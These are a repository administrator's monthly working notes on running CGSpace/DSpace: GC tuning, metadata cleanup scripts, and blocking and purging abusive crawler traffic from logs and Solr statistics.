- I started looking into the request regarding the CIAT Library PDFs
- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
- The links seem to be down though! I emailed Paola to ask
## 2022-03-31
- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
- I will do the following for CMS and G1GC on DSpace Test:
- Wait for startup
- Reload home page
- Log in
- Do a search for "livestock"
- Click AGROVOC facet for livestock
- dspace index-discovery -b
- dspace-statistics-api index
- With CMS the Discovery Index took:
```console
real 379m19.245s
user 267m17.704s
sys 4m2.937s
```
- Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
- I extracted a list of URLs from CGSpace to send him:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
COPY 4552
```
- I did some checks and cleanups in OpenRefine because there are some values with "#page" etc
- Once I sorted and de-duplicated them there were only ~2,700 unique URLs, which means there are going to be almost two thousand items with duplicate PDFs
- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-04.md
---
title: "April, 2022"
date: 2022-04-01T10:53:39+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-04-01
- I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday
- The Discovery indexing took this long:
```console
real 334m33.625s
user 227m51.331s
sys 3m43.037s
```
## 2022-04-04
- Start a full harvest on AReS
- Help Marianne with submit/approve access on a new collection on CGSpace
- Go back in Gaia's batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)
- Looking at the Solr statistics for 2022-03 on CGSpace
- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: `Apache-HttpClient/4.5.9 (Java/1.8.0_322)`, and many others with a normal browser agent, so that's fishy!
- The DSpace agent pattern `http.?agent` seems to have caught the first ones, but I'll purge the IP ones
- I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for `dns:*msnbot* AND dns:*.msn.com.` I see over 100,000, which is a problem I noticed a few months ago too...
- I extracted the MSN Bot IPs from Solr using an IP facet, then used the `check-spider-ip-hits.sh` script to purge them
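- The purge itself was the same pattern as usual, something like this (the file name is illustrative):
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/msnbot-ips.txt -p
```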
## 2022-04-10
- Start a full harvest on AReS
## 2022-04-13
- UptimeRobot mailed to say that CGSpace was down
- I looked and found the load at 44...
- There seem to be a lot of locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
3173 dspaceWeb
```
- Looking at the top IPs in nginx's access log one IP in particular stands out:
```console
941 66.249.66.222
1224 95.108.213.28
2074 157.90.209.76
3064 66.249.66.221
95743 185.192.69.15
```
- 185.192.69.15 is in the UK
- I added a block for that IP in nginx and the load went down...
## 2022-04-16
- Start harvest on AReS
## 2022-04-18
- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I'm on holiday out of the country for Easter)
- I see there are many locks in use from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
8932 dspaceWeb
```
- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
```console
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
752 69.162.124.231
759 66.249.64.213
864 66.249.66.222
905 2a01:4f8:221:f::2
1013 84.33.2.97
1201 157.55.39.159
1204 157.55.39.144
1209 157.55.39.102
1217 157.55.39.161
1252 207.46.13.177
1274 157.55.39.162
2553 66.249.66.221
2941 95.108.213.28
```
- One IP is using a strange user agent though:
```console
84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
```
- Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
17314
```
- That's a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
- The ISPs I've seen so far are ChinaNet and China Unicom
- I extracted all the IPs from today and resolved them:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
```
- The top ASNs by IP are:
```console
$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
102 GOOGLE
139 Maxihost LTDA
165 AMAZON-02
393 "China Mobile Communications Group Co., Ltd."
473 AMAZON-AES
616 China Mobile communications corporation
642 M247 Ltd
2336 HostRoyale Technologies Pvt Ltd
4556 Chinanet
5527 CHINA UNICOM China169 Backbone
$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
139 262287
165 16509
180 204287
393 9808
473 14618
615 56041
642 9009
2156 203020
4556 4134
5527 4837
```
- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
- I will download the IP blocks for each ASN except Google and Amazon and ban them
```console
$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
20296
```
- I extracted the IPv4 and IPv6 networks:
```console
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
```
- I suspect we need to aggregate these networks since there are so many of them and nftables doesn't like it when they overlap:
```console
$ wc -l /tmp/ipv4-networks.txt
15464 /tmp/ipv4-networks.txt
$ aggregate6 /tmp/ipv4-networks.txt | wc -l
2781
$ wc -l /tmp/ipv6-networks.txt
4833 /tmp/ipv6-networks.txt
$ aggregate6 /tmp/ipv6-networks.txt | wc -l
338
```
- I deployed these lists on CGSpace, ran all updates, and rebooted the server
- This list is SURELY too broad because we will block legitimate users in China... but right now how can I discern?
- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
![PostgreSQL connections day](/cgspace-notes/2022/04/postgres_connections_ALL-day.png)
![DSpace sessions day](/cgspace-notes/2022/04/jmx_dspace_sessions-day.png)
- I used `grepcidr` with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
```console
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
# wc -l /tmp/ipv4-ips.txt
15313 /tmp/ipv4-ips.txt
# wc -l /tmp/ipv6-ips.txt
19 /tmp/ipv6-ips.txt
```
- Then I purged them from Solr using the `check-spider-ip-hits.sh`:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
```
## 2022-04-23
- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the `example` file that contains most patterns
- I updated CGSpace, then ran all system updates and rebooted the host
- I also ran `dspace cleanup -v` to prune the database
## 2022-04-24
- Start a harvest on AReS
## 2022-04-25
- Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
- There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can't
- I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
- I notice we have over 1,000 items with region `Africa South of Sahara`
- I am surprised to see these because we did a mass migration to `Sub-Saharan Africa` in 2020-10 when we aligned to UN M.49
- Oh! It seems I used a capital O in `Of`!
- This is curious, I see we missed `East Asia` and `North America`, because those are still in our list, but UN M.49 uses `Eastern Asia` and `Northern America`... I will have to raise that with Peter and Abenet later
- For now I will just re-run my fixes:
```console
$ cat /tmp/regions.csv
cg.coverage.region,correct
East Africa,Eastern Africa
West Africa,Western Africa
Southeast Asia,South-eastern Asia
South Asia,Southern Asia
Africa South of Sahara,Sub-Saharan Africa
North Africa,Northern Africa
West Asia,Western Asia
$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct
```
- Then I started a new harvest on AReS
## 2022-04-27
- I woke up to many up down notices for CGSpace from UptimeRobot
- The server has load 111.0... sigh.
- According to Grafana it seems to have started at 4:00 AM
![Grafana load](/cgspace-notes/2022/04/cgspace-load.png)
- There are a metric fuck ton of database locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
128 dspaceApi
16890 dspaceWeb
```
- As for the server logs, I don't see many IPs connecting today:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
2924
```
- But there appear to be some IPs making many requests:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
345 207.46.13.53
646 66.249.66.222
678 54.90.79.112
1529 136.243.148.249
1797 54.175.8.110
2304 174.129.118.171
2523 66.249.66.221
2632 52.73.204.196
2667 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6373 3.85.92.145
7383 34.227.10.4
8330 100.24.63.172
8342 34.236.36.176
8369 44.200.190.111
8371 3.238.116.153
8391 18.232.101.158
8631 3.239.81.247
8634 54.82.125.225
```
- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
```
- None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:
```console
$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5760
$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
6053
$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5841
$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5887
$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5899
...
```
- And we can see a massive spike in sessions in Munin:
![Grafana load](/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png)
- I see the following IPs using that user agent today:
```console
# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
678 54.90.79.112
1797 54.175.8.110
2697 174.129.118.171
2765 52.73.204.196
3072 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6783 3.85.92.145
7763 34.227.10.4
8738 100.24.63.172
8748 34.236.36.176
8787 3.238.116.153
8794 18.232.101.158
8806 44.200.190.111
9021 54.82.125.225
9027 3.239.81.247
```
- I added those IPs to the firewall and then purged their hits from Solr:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 6024 hits from 100.24.63.172 in statistics
Purging 1719 hits from 174.129.118.171 in statistics
Purging 5972 hits from 18.232.101.158 in statistics
Purging 6053 hits from 3.238.116.153 in statistics
Purging 6228 hits from 3.239.81.247 in statistics
Purging 5305 hits from 34.227.10.4 in statistics
Purging 6002 hits from 34.236.36.176 in statistics
Purging 3908 hits from 35.153.131.101 in statistics
Purging 3692 hits from 35.172.193.232 in statistics
Purging 4525 hits from 3.85.92.145 in statistics
Purging 6048 hits from 44.200.190.111 in statistics
Purging 1942 hits from 52.73.204.196 in statistics
Purging 1944 hits from 54.174.240.122 in statistics
Purging 1264 hits from 54.175.8.110 in statistics
Purging 6117 hits from 54.82.125.225 in statistics
Purging 486 hits from 54.90.79.112 in statistics
Total number of bot hits purged: 67229
```
- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
```console
$ cat /tmp/ips.csv
IP,Categories,ReportDate,Comment
100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
```
- An hour or so later two more IPs on Amazon started making requests with that user agent too:
- 3.82.22.114
- 18.234.122.84
- Load on the server went back up, sigh
- I added those IPs to the firewall drop list and purged their hits from Solr as well:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 2839 hits from 3.82.22.114 in statistics
Purging 592 hits from 18.234.122.84 in statistics
Total number of bot hits purged: 343
```
- Oh god, there are more coming
- 3.81.21.251
- 54.162.92.93
- 54.226.171.89
## 2022-04-28
- Had a meeting with FAO and the team from SEAFDEC, who run many repositories that are integrated with AGROVOC
- Elvi from SEAFDEC has modified the [DSpace-CRIS 6.x VIAF lookup plugin to query AGROVOC](https://github.com/eulereadgbe/DSpace/blob/sair-6.3/dspace-api/src/main/java/org/dspace/content/authority/AgrovocAuthority.java)
- Also, they are doing a nice integration similar to the WorldFish / MELSpace repositories where they store the AGROVOC URIs in DSpace and show the terms with an icon in the UI
- See: https://repository.seafdec.org.ph/handle/10862/6320
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-05.md
---
title: "May, 2022"
date: 2022-05-04T09:13:39+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-05-04
- I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too:
- 18.207.136.176
- 185.189.36.248
- 50.118.223.78
- 52.70.76.123
- 3.236.10.11
- Looking at the Solr statistics for 2022-04
- 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
- 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
- 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
- 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don't know why its requests were logged in Solr
- 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
- 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
- 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don't know why its requests were logged in Solr
- If I query Solr for `time:2022-04* AND dns:*msnbot* AND dns:*.msn.com.` I see a handful of IPs that made 41,000 requests
- I purged 93,974 hits from these IPs using my `check-spider-ip-hits.sh` script
<!--more-->
- Now looking at the Solr statistics by user agent I see:
- `SomeRandomText`
- `RestSharp/106.11.7.0`
- `MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)`
- `wp_is_mobile`
- `Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"`
- `insomnia/2022.2.1`
- `ZoteroTranslationServer`
- `omgili/0.5 +http://omgili.com`
- `curb`
- `Sprout Social (Link Attachment)`
- I purged 2,900 hits from these user agents from Solr using my `check-spider-hits.sh` script
- I made a [pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/54) for some of these agents
- In the mean time I will add them to our local overrides in DSpace
- Run all system updates on AReS server, update all Docker containers, and restart the server
- Start a harvest on AReS
## 2022-05-05
- Update PostgreSQL JDBC driver to 42.3.5 in the Ansible infrastructure playbooks and deploy on DSpace Test
- Peter asked me how many items we add to CGSpace every year
- I wrote a SQL query to check the number of items grouped by their accession dates since 2009:
```console
localhost/dspacetest= ☘ SELECT EXTRACT(year from text_value::date) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
yyyy │ count
──────┼───────
2022 │ 2073
2021 │ 6471
2020 │ 4074
2019 │ 7330
2018 │ 8899
2017 │ 6860
2016 │ 8451
2015 │ 15692
2014 │ 16479
2013 │ 4388
2012 │ 6472
2011 │ 2694
2010 │ 2457
2009 │ 293
```
- Note that I had an issue with casting `text_value` to date because one item had an accession date of `2016` instead of `2016-09-29T20:14:47Z`
- Once I fixed that PostgreSQL was able to [extract() the year](https://www.postgresql.org/docs/12/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT)
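- For reference, a quick way to spot malformed accession dates like that one is something along these lines (a sketch):
```console
localhost/dspacetest= ☘ SELECT text_value FROM metadatavalue WHERE metadata_field_id=11 AND text_value !~ '^\d{4}-\d{2}-\d{2}';
```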
- There were some other methods I tried that worked also, for example `TO_DATE()`:
```console
localhost/dspacetest= ☘ SELECT EXTRACT(year from TO_DATE(text_value, 'YYYY-MM-DD"T"HH24:MI:SS"Z"')) AS YYYY, COUNT(*) FROM metadatavalue WHERE metadata_field_id=11 GROUP BY YYYY ORDER BY YYYY DESC LIMIT 14;
```
- But it seems PostgreSQL is smart enough to recognize date formatting in strings automatically when we cast so we don't need to convert to date first
- Another thing I noticed is that a few hundred items have accession dates from decades ago, perhaps this is due to importing items from the CGIAR Library?
- I spent some time merging a few pull requests for DSpace 6.4 and porting one to `main` for DSpace 7.x
- I also submitted a [pull request to migrate Mirage 2's build from bower and compass to yarn and node-sass](https://github.com/DSpace/DSpace/pull/8288)
## 2022-05-07
- Start a harvest on AReS
## 2022-05-09
- Submit an issue to Atmire's bug tracker inquiring about DSpace 6.4 support
## 2022-05-10
- Submit an updated [pull request to migrate Mirage 2's build from bower and compass to npm and node-sass](https://github.com/DSpace/DSpace/pull/8292)
- This one is better than the previous one because it uses npm directly, which comes with the Node.js distribution, rather than requiring the user to install yarn
- I also updated a bunch of grunt build deps
## 2022-05-12
- CGSpace meeting with Abenet and Peter
- We discussed the future of CGSpace and DSpace in general in the new One CGIAR
- We discussed how to prepare for bringing in content from the Initiatives, whether we need new metadata fields to support people from IFPRI etc
- We discussed the need for good quality Drupal and WordPress modules so sites can harvest content from the repository
- Peter asked me to send him a list of investors/funders/donors so he can clean it up, but also to try to align it with ROR and eventually do something like we do with country codes, adding the ROR IDs and potentially showing the badge on item views
- We also discussed removing some Mirage 2 themes for old programs and CRPs that don't have custom branding, ie only Google Analytics
- Export a list of donors for Peter to clean up:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.donor", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-05-12-donors.csv WITH CSV HEADER;
COPY 1184
```
- Then I created a CSV from our `cg-creator-identifier.xml` controlled vocabulary and ran it against our database with `add-orcid-identifiers-csv.py` to see if any author names happened to match ones that are missing ORCIDs in CGSpace:
```console
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-05-12-add-orcids.csv -db dspace -u dspace -p 'fuuu' | tee /tmp/orcid.log
$ grep -c "Adding ORCID" /tmp/add-orcids.log
85
```
- So it's only eighty-five, but better than nothing...
- I removed the custom Mirage 2 themes for some old projects:
- AgriFood
- AVCD
- LIVES
- FeedTheFuture
- DrylandSystems
- TechnicalConsortium
- EADD
- That should knock off a few minutes of the maven build time!
- I generated a report from the AReS nginx logs on linode18:
```console
# zcat --force /var/log/nginx/access.log.* | grep 'GET /explorer' | goaccess --log-format=COMBINED - -o /tmp/ares_report.html
```
## 2022-05-13
- Peter finalized the corrections on donors from yesterday so I extracted them into fix/delete CSVs and ran them on CGSpace:
```console
$ ./ilri/fix-metadata-values.py -i 2022-05-13-fix-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -t correct -d
$ ./ilri/delete-metadata-values.py -i 2022-05-13-delete-CGSpace-Donors.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.donor -m 248 -d
```
- I cleaned up a few records manually (like some that had \r\n) then re-exported the donors and checked against the latest ROR dump:
```console
$ ./ilri/ror-lookup.py -i /tmp/2022-05-13-donors.csv -r v1.0-2022-03-17-ror-data.json -o /tmp/2022-05-13-ror.csv
$ csvgrep -c matched -m true /tmp/2022-05-13-ror.csv | wc -l
230
$ csvgrep -c matched -m false /tmp/2022-05-13-ror.csv | csvcut -c organization > /tmp/2022-05-13-ror-unmatched.csv
```
- Then I sent Peter a list so he can try to update some from ROR
- I did some work to upgrade the Mirage 2 build dependencies in our `6_x-prod` branch
- I switched to Node.js 14 also
- Meeting with Margarita and Manuel from ABC to discuss uploading ~6,000 automatically-generated CRP policy reports from MARLO to CGSpace
- They will try to provide the records and PDFs by mid June because they are still finalizing the reports for 2021
- MARLO will be going offline because it was for the CRPs
- We reviewed the metadata they have and gave them some advice on the formatting
- Once we upload the records I will need to provide them with a mapping of the MARLO URLs to Handle URLs so they can set up redirects
## 2022-05-14
- Start a full Discovery index
- Start an AReS harvest
## 2022-05-23
- Start an AReS harvest
## 2022-05-24
- Update CGSpace to latest `6_x-prod` branch, which removes a handful of Mirage 2 themes and migrates to Node.js 14 and some newer build deps
- Run all system updates on CGSpace (linode18) and reboot it
## 2022-05-25
- Maria Garruccio sent me a handful of new ORCID identifiers for Alliance staff
- We currently have 1349 unique identifiers and this adds about forty-five new ones (!):
```console
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | sort | uniq | wc -l
1349
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new-abc-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2022-05-25-combined-orcids.txt
$ wc -l /tmp/2022-05-25-combined-orcids.txt
1395 /tmp/2022-05-25-combined-orcids.txt
```
- After combining and filtering them I resolved their names using my `resolve-orcids.py` script:
```console
$ ./ilri/resolve-orcids.py -i /tmp/2022-05-25-combined-orcids.txt -o /tmp/2022-05-25-combined-orcids-names.txt
```
- There are some names that changed, so I need to run them through the `fix-metadata-values.py` script:
```console
$ cat 2022-05-25-update-orcids.csv
cg.creator.identifier,correct
"Andrea Fongar: 0000-0003-2084-1571","ANDREA CECILIA SANCHEZ BOGADO: 0000-0003-4549-6970"
"Bekele Shiferaw: 0000-0002-3645-320X","Bekele A. Shiferaw: 0000-0002-3645-320X"
"Henry Kpaka: 0000-0002-7480-2933","Henry Musa Kpaka: 0000-0002-7480-2933"
"Josephine Agogbua: 0000-0001-6317-1227","Josephine Udunma Agogbua: 0000-0001-6317-1227"
"Martha Lilia Del Río Duque: 0000-0002-0879-0292","Martha Del Río: 0000-0002-0879-0292"
$ ./ilri/fix-metadata-values.py -i 2022-05-25-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -m 247 -t correct -d -n
Connected to database.
Would fix 4 occurences of: Andrea Fongar: 0000-0003-2084-1571
Would fix 1 occurences of: Bekele Shiferaw: 0000-0002-3645-320X
Would fix 2 occurences of: Josephine Agogbua: 0000-0001-6317-1227
Would fix 34 occurences of: Martha Lilia Del Río Duque: 0000-0002-0879-0292
```
## 2022-05-26
- I extracted the names and ORCID identifiers from Maria's spreadsheet and produced several CSV files with different name formats:
- First Last (GREL: `cells['First Name'].value + ' ' + cells['Surname'].value`)
- Last, First (GREL: `cells['Surname'].value + ", " + cells['First Name'].value`)
- Last, F. (GREL: `cells['Surname'].value + ", " + cells['First Name'].value.substring(0, 1) + "."`)
- Then I constructed a CSV for each of these variations to use with `add-orcid-identifiers-csv.py`
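- Each of those CSVs uses the same two-column format that `add-orcid-identifiers-csv.py` expects, for example (the name and identifier here are just placeholders):
```console
$ head -n 2 /tmp/2022-05-26-orcids-first-last.csv
dc.contributor.author,cg.creator.identifier
"Jane Doe","Jane Doe: 0000-0002-1825-0097"
```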
- In total I matched a bunch of authors and added 872 new metadata fields!
## 2022-05-27
- Send a follow up to Leroy from the Alliance to ask about the CIAT Library URLs
- It seems that I forgot to attach the list of PDFs when I last communicated with him in 2022-03
- Meeting with Terry Bucknell from Overton.io
## 2022-05-28
- Start a harvest on AReS
## 2022-05-30
- Help IITA with some collection authorization issues on CGSpace
- Finally looking into Peter's Altmetric export from 2022-02
- We want to try to compare some of the information about open access status with that in CGSpace
- I created a new column for all items that have CGSpace handles using this GREL:
```console
"https://hdl.handle.net/" + value.match(/.*?(10568\/\d+).*?/)[0]
```
- With that I can do a join on the CGSpace metadata and perhaps clean up some items
```console
$ ./bin/dspace metadata-export -f 2022-05-30-cgspace.csv
$ csvcut -c 'id,dc.identifier.uri[en_US],dcterms.accessRights[en_US],dcterms.license[en_US]' 2022-05-30-cgspace.csv | sed '1 s/dc\.identifier\.uri\[en_US\]/dc.identifier.uri/' > /tmp/cgspace.csv
$ csvjoin -c 'dc.identifier.uri' ~/Downloads/2022-05-30-Altmetric-Research-Outputs-CGSpace.csv /tmp/cgspace.csv > /tmp/cgspace-altmetric.csv
```
- Examining the data in OpenRefine I spot checked a few records where Altmetric and CGSpace disagree and in most cases I found Altmetric to be wrong...
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-06.md
---
title: "June, 2022"
date: 2022-06-06T09:01:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-06-06
- Look at the Solr statistics on CGSpace
- I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS "msnbot-" using the Solr query `dns:*msnbot* AND dns:*.msn.com`
- I purged these first so I could see the other "real" IPs in the Solr facets
- I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
- I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
- I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent
- There seem to be many more of these:
<!--more-->
```console
# zcat --force /var/log/nginx/access.log* | grep 208.185.238. | awk '{print $1}' | sort | uniq -c | sort -h
2 208.185.238.1
166 208.185.238.54
1293 208.185.238.51
2587 208.185.238.59
4692 208.185.238.56
5480 208.185.238.53
6277 208.185.238.52
6400 208.185.238.58
8261 208.185.238.55
17549 208.185.238.57
```
- I see 3,000 hits from 178.208.75.33, a Russian-owned IP in the Netherlands that is making a GET request to / every minute, using a normal user agent
- I see 3,000 hits from 134.122.124.196 on Digital Ocean to the REST API with a normal user agent
- I purged all these hits from IPs for a total of about 265,000
- Then I faceted by user agent and found:
- 1,000 hits by `insomnia/2022.2.1`, which I also saw last month and submitted to COUNTER-Robots
- 265 hits by `omgili/0.5 +http://omgili.com`
- 150 hits by `Vizzit`
- 132 hits by `MetaInspector/5.7.0 (+https://github.com/jaimeiniesta/metainspector)`
- 73 hits by `Scoop.it`
- 62 hits by `bitdiscovery`
- 59 hits by `Asana/1.4.0 WebsiteMetadataRetriever`
- 32 hits by `Sprout Social (Link Attachment)`
- 29 hits by `CyotekWebCopy/1.9 CyotekHTTP/6.2`
- 20 hits by `Hootsuite-Authoring/1.0`
- I purged about 4,100 hits from these user agents
- Run all system updates on AReS server (linode20) and reboot
- I want to try to update some of the build dependencies of OpenRXV since Node.js 12 is no longer supported
- Upgrade linode20 to Ubuntu 22.04 and start an AReS harvest
